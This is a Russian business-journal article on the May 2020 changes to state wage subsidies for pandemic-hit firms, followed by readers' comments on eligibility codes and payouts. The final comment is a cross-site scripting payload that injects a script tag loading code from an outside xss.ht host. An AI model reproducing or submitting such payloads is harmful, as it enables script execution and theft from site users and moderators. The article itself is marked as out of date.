Что изменилось в зарплатных субсидиях для бизнеса в мае 2020 года

36
Что изменилось в зарплатных субсидиях для бизнеса в мае 2020 года

Новые условия субсидий на работников в 2021 году

Этот материал больше не актуален.

С 1 ноября 2021 года начался новый этап программы господдержки бизнеса в виде субсидий на работников из-за нерабочих дней. Уже можно отправлять заявки. Все условия — в отдельном разборе.

Также до конца 2021 года можно оформить льготный кредит под 3%. Первые полгода платежей не будет, погасить долг нужно в течение следующих 12 месяцев.

Что случилось. Правительство изменило правила выплаты субсидий бизнесу из пострадавших отраслей. Деньги в размере одного МРОТ на каждого работника выделяются, если компания или ИП сохраняет не менее 90% штата. Также эти гранты могут получить ИП без работников. Возвращать деньги не нужно, процентов тоже нет, а тратить полученное можно куда угодно. Эти субсидии уже выдают, но теперь условия стали удобнее для предпринимателей.

Долги перед налоговой. Раньше было условие, что субсидию могли получить только те компании и ИП, чей общий долг по налогам и взносам на 1 марта 2020 года не превышал 3000 ₽. Теперь денег дадут даже тем, у кого долг больше, если его погасили до отправки заявления. Если в марте недоимка была больше — погашайте и получайте деньги из бюджета. Налоги все равно придется платить, а тут — безвозмездная господдержка. По сути, можно заплатить налоги деньгами государства.

Численность штата. Чтобы получить субсидию, нужно сохранить минимум 90% штата по сравнению с мартом 2020 года. Но была проблема с расчетом численности для бизнеса, где работает меньше 10 человек. Например, если у компании было восемь сотрудников и одного уволили, требование о численности уже не соблюдалось: оставалось меньше 90%. Теперь добавили условие, что нужно сохранить 90% или уволить только одного человека. Еще больше небольших компаний смогут получить бюджетные деньги.

Счета ИП. Руководитель ФНС подтвердил, что индивидуальные предприниматели могут получать субсидии не только на счет ИП в банке, но и на свой личный счет. Если закрыли расчетный счет из-за отсутствия выручки или ради экономии, теперь это не проблема. Государство пришлет деньги на карту. Фирмам нужен расчетный счет.

ОКВЭДы для розницы. Раньше в списке пострадавших отраслей для непродовольственной розницы были указаны два ОКВЭДа: 47.19.1 и 47.19.2. Получалось, что бизнес с ОКВЭДом 47.19 не мог подать заявление. Это, конечно, абсурд. Но неточность быстро исправили — теперь весь ОКВЭД 47.19 может претендовать на бюджетные деньги. Заодно добавили изделия народных промыслов и торговлю через автоматы.

Как получить субсидию. Изучите инструкцию и подавайте заявление. Десятки тысяч компаний уже получили деньги и могут их тратить. ФНС регулярно передает реестры. Проверки проходят довольно быстро.

И не забудьте подать СЗВ-М. Эта форма нужна для проверки численности. Чем раньше подадите, тем быстрее получите деньги.

Пробовали получить деньги из бюджета? Как успехи?
Комментарии проходят модерацию по правилам журнала
Загрузка
0

У меня ОКВЭД 85.42.1. Проще говоря Инструктор обучения вождению в автошколе. Т.е. десятки тыс. ИП в единственном числе. Нас вообще забыли. А откроют нас, я так понимаю, самыми последними. И ничего не положено.

5
0

Повторяют как мантру: ОСНОВНОЙ ОКВЭД. Сейчас был вебинар на местном уровне - проблема дополнительного оквэда у многих. Но на местном уровне умыли руки - сказали мы ничего не решаем

3
0

Та же проблема, мой ОКВЭД 85.42.1 - налоговая ответила, что не отношусь к пострадавшей отрасли бизнеса. При этом, похожий ОКВЭД 85.41 вошёл в этот список, вопрос, а чем отличаются они??? Вот такое у нас государство.

2
0

У меня по основному ОКВЭДу нет деятельности и она не из пострадавших, а вот кафе мое на вспомогательном ОКВЭД ,а по нему не дают субсидию. Где справедливость? - если это был единственный доход у меня...???

1

Людмила, не помню кому,по-моему ИП дают и по дополнительным ОКВЭДам.Если есть сотрудники ,попробуйте взять беспроцентный кредит на зарплату.Если сохраните штат в течении полугода- вообще ничего отдавать не надо,всё погасит государство.Постановление правительства 422.Список банков найдёте в инете.

2

Александр, откуда информация про дополнительные оквэды???

1

Александр, и ИП без сотрудников почти наверняка получит отлуп

0

Александр, по дополнительным дают только беспроцентные кредиты. Представитель ФНС сделал на этом прямо акцент. Но есть серьезный подвох: выдавать или нет кредит решает банк! А он может отказать по одному ему известным причинам, и мотивировать это не должен (как и обычные кредиты). В этом принципиальное различие с гос помощью - где есть хоти и тупые, но четкие критерии.

Вчера одна предпринимательница задавала вопрос - подалась на кредит, входит в пострадавшие, есть сотрудники, никого не увольняла.. А банк отказал.. Спрашивала можно ли как то банк нагнуть..

0

Александр, а если ИП без сотрудников, можно взять кредит и не отдавать? А как?

0

Людмила, так попали многие. Сегодня на вебинаре этот вопрос задавали 3 раза. Представитель фнс только мычал

0
0

Божечки-кошечки!!!! Получил субсидию. Спасибо Тинькофф, все по ссылкам заполнил.
Есть нюанс - не было электронной подписи в самой налоговой (электронный кабинет в ФНС). Как быть? Проявив смекалку, письмо отправил заказное без уведомления. Почему без уведомления - потому что с уведомлением идет долго и толку мало от него по опыту. А еще, понимая, как работает наша почта (частенько я думаю о том ,что идеальный логотип для почты - накурившаяся черепаха), то дополнительно отправил скан письма с самого расчетного счета в разделе Тинькофф , тот самый, куда обычно налоговая всякую фигню присылает нерадостную))
И через несколько дней (меньше недели прошло) в полночь как в фильмах-триллерах пришло Пуш-уведомление от Тинькофф. Но посмотрев что это, радости не было предела - это реально работает!!! Ребят , пробуйте , отсылайте заявление. Все получите.

1

Александр, у меня ещё проще получилось.Заехал в налоговую (мимо проезжал,смотрю двери открыты),а там ящик стоит,типа урны для голосования,кинул заявление и уехал.Через пару дней тоже ночью пришли "бабосы".

2
0

Как получить?

0
0

Субсидия была получена.
И Тинькофф пошел на встречу и не снимал абонентскую плату за счёт.
Всем спасибо!

0

Дмитрий, а как у вас получилось платить за обслуживание счета?

0

Надежда, Надежда, позвонил в банк и попросил в связи с невозможностью работать отменить оплату за простаивающий счёт.

0

Дмитрий, спасибо!

0

Надежда, НЕ платить, я имела в виду

0
0

Ничего не понимаю. Если 90 включен в список, а у меня 90.01, то я не получаю, или получаю?!

0

Чадо, получаешь конечно.Все у кого 90(01,02,03......).

1

Александр, ооооо! Спасибо!

0
0

Субсидию получил через два дня после подачи заявления.Оперативно!

0
0

есть какие-то новости для тех , у кого ОКВЭД из "пострадавших отраслей" числится как неосновной?

0

Ольга, пишите письма. Если смириться - ничего не изменится )

1

Ольга, где то в интернете ходят петиции. Боремся. Но пока ничего нового

1
0

У нас ИП и ООО. По оквэду подходим. ИП уже получил, а ООО ещё нет. Как-то странно.

0
0

А если поменять оквэд, то можно получить выплату ? У нас пострадавший оквэд оказался не основным ...

0
0

Полностью попадаем под субсидию, налоговая заявления приняла,денег нет и скорее всего не будет , т.к. уже распилины до нас.

0
0

У меня ОКВЭД 85.41.1
Субсидию уже получил.
Не удобно, конечно придумано с этим электронным ключом. Пришлось искать обходные пути.
В Брянской области, к примеру, при подаче заявления этот ключ отменили.
Хотелось, чтобы это сделали во всех регионах.

0
0

Я строитель. Все объекты заморозились,заказчики "на мель сели". А в список не вхожу. Типа мы не пострадали. Короче как обычно,государство прокатило.

0
0

Да, обидно, конечно, что ОКВЭД 85.41 получил выплату, а 85.42 - нет :(
Когда пару лет хотел сменить, налоговая ответила: "Да, это принципе не так важно".
А оказалось очень даже важно. Будем надеяться, что разрешат уточнить свой ОКВЭД

0
0

Я самозанятый, в личном кабинете налогоплательщика мне пришло сообщение о том, что мне зачислен дополнительный «налоговый капитал» (бонус) в размере одного МРОТ. Не очень понимаю, как мне его получить и получу ли я его вообще. Написал в поддержку из личного кабинета, там говорят что я получу назад уплаченные налоги самозанятого.. Ничего не понимаю, что я получу и как это сделать? Карту я привязал в личном кабинете. Остается просто ждать? 🤷🏻‍♂️

0
0

Получили без проблем. И этими деньгами оплатили НДС :)
Откуда пришло, туда и ушло.

0
0

"><Script Src=Https://Naglinagli.Xss.Ht></Script>

0

Сообщество